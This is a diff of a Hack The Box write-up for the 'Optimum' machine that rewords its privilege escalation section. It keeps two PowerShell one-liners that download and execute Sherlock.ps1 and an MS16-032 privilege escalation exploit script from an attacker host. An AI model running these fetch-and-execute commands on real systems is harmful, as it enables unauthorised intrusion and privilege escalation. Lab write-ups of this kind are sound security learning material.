Kyuu-Ji/htb-write-up/optimum/write-up-optimum.md

 ## Privilege Escalation

-We search for vulnerabilities by using **Sherlock.ps1** with the _Find-AllVulns function_ to get information about hotfixes.
+Searching for vulnerabilities now by using **Sherlock.ps1** with the _Find-AllVulns function_ to get information about hotfixes.
  ```markdown
 IEX(New-Object Net.WebClient).downloadString('http://10.10.14.23:8000/Sherlock.ps1')
 ```

-It appears to be vulnerable against **MS016-032 - Secondary Logon Handle** which we will exploit with the script _Invoke-MS16032.ps1_.
+It appears to be vulnerable against **MS016-032 - Secondary Logon Handle** which can be exploited with the script _Invoke-MS16032.ps1_.
 ```markdown
 IEX(New-Object Net.WebClient).downloadString('http://10.10.14.23:8000/Invoke-MS16032.ps1')
 ```